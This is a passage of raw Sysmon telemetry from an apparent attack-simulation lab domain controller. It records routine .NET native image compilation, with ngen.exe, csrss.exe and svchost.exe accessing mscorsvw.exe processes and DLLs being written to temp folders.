13:50:09.869{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-AC03-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.869{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-AC03-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-AB03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.666{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-AB03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.666{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-AB03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:09.603{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f4c-0\Microsoft.Transactions.Bridge.Dtc.dll2021-01-18 13:50:09.603 10341000x80000000000000007964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.431{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.416{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.416{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-A903-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.353{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-A903-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.353{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-A903-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:09.260{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4dc-0\Microsoft.Transactions.Bridge.dll2021-01-18 13:50:09.260 10341000x80000000000000007978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9212-6005-AE03-00000000A301}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.541{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9212-6005-AE03-00000000A301}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.541{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9212-6005-AE03-00000000A301}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:10.447{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\62c-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-01-18 13:50:10.447 10341000x80000000000000007974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.103{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.088{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.088{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:11.088{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:11.072{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:11.072{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.947{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B503-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.931{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B503-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.931{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B503-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Wind